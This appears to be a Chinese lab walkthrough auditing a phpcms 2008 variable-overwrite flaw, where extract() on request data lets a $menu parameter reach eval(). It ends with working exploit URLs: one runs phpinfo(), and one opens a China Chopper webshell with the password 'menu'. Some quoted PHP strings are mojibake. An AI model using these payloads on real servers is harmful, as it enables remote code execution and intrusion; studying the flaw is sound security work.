phpcms 2008 变量覆盖漏洞

一、 启动环境

1.双击运行桌面phpstudy.exe软件

2.点击启动按钮，启动服务器环境

二、代码审计

1．双击启动桌面Seay源代码审计系统软件

3．点击新建项目按钮，弹出对画框中选择（C:\phpStudy\WWW\ phpcms 2008），点击确定

漏洞分析

1．点击展开/yp/web/include/common.inc.php

<?php
defined('IN_PHPCMS') or exit('Access Denied');

$userid = $userid ? $userid : intval(QUERY_STRING);
$r = $db->get_one("SELECT * FROM `".DB_PRE."member_company` WHERE `userid`='$userid'");
if($r)
{
	extract($r);
}

if(!$userid)
{
	$MS['title'] = '浣犺璁块棶鐨勭珯鐐逛笉瀛樺湪';
	$MS['description'] = '璇锋牳瀵圭綉鍧€鏄惁姝ｇ‘.';
	$MS['urls'][0] = array(
		'name'=>'璁块棶缃戠珯棣栭〉',
		'url'=>$PHPCMS['siteurl'],
		);
	$MS['urls'][1] = array(
		'name'=>'娉ㄥ唽涓烘湰绔欎細鍛?,
		'url'=>$PHPCMS['siteurl'].'member/register.php',
		);
	msg($MS);
}

程序首先赋值一个$userid变量，然后使用赋值完成变量拼接sql语句执行，SQL语句执行完成以后返回数据给$r变量数组，如果$r变量存在内容，则将变量数组内容加入到当前文件的符号表中。如果$userid变量内容为false则将显示错误页面内容，但是目前$userid并没有找到在哪里获取。 2.如果$userid不为false，则接着往下执行

if(empty($tplname)) $tplname = 'default';
//用户选择的默认模板
$companytpl_config = include PHPCMS_ROOT.'templates/'.TPL_NAME.'/yp/companytplnames.php';

$tpl = $companytpl_config[$tplname]['tplname'];

define('TPL', $tpl);
define('WEB_SKIN', 'templates/'.TPL_NAME.'/yp/css/');
if($diy)
{
	define('SKIN_DIY', WEB_SKIN.$userid.'_diy.css');
}
else
{
	define('SKIN_DIY', WEB_SKIN.$companytpl_config[$tplname]['style']);
}
$menu = string2array($menu);

代码接着进行初始化模板文件，最后将$menu变量传输到string2array（）函数，目前又来疑问，$menu变量从何而来？
3.现在需要了解一下string2array()到底什么作用，string2array函数存放在include/global.func.php

function string2array($data)
{
	if($data == '') return array();
	eval("\$array = $data;");
	return $array;
}

看到函数发现，内部有eval敏感函数，并且把传送过去的$menu进行执行，现在有这么个假设，如果$menu变量可以控制，那么完全进行任意代码执行。
4．目前成立这个假设$userid主要是为了去数据库查询内容，然后将返回的内容构成一个数组，使用extract（）将数组的内容添加到当前符号表中，从而也就生成$menu变量，如果能够让数据库返回空，不让他覆盖或者生成新的$menu变量，然后在别的位置生成新的$menu变量，从而执行想执行代码。
5．在include/common.inc.php文件中，会将GET、POST、Cookie转换成变量

if($_REQUEST)
{
	if(MAGIC_QUOTES_GPC)
	{
		$_REQUEST = new_stripslashes($_REQUEST);
		if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);
		extract($db->escape($_REQUEST), EXTR_SKIP);
	}
	else
	{
		$_POST = $db->escape($_POST);
		$_GET = $db->escape($_GET);
		$_COOKIE = $db->escape($_COOKIE);
		@extract($_POST,EXTR_SKIP);
		@extract($_GET,EXTR_SKIP);
		@extract($_COOKIE,EXTR_SKIP);
	}
	if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);
	if($_COOKIE) $db->escape($_COOKIE);
}

所以可以利用这个位置提前生成$menu变量和$userid变量，并且把$userid内容置位数据库不存在的内容，$menu变量内容为想要执行的代码。

漏洞利用

1.访问

http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=phpinfo();exit;

菜刀直接连接

http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=exit;   
//密码 menu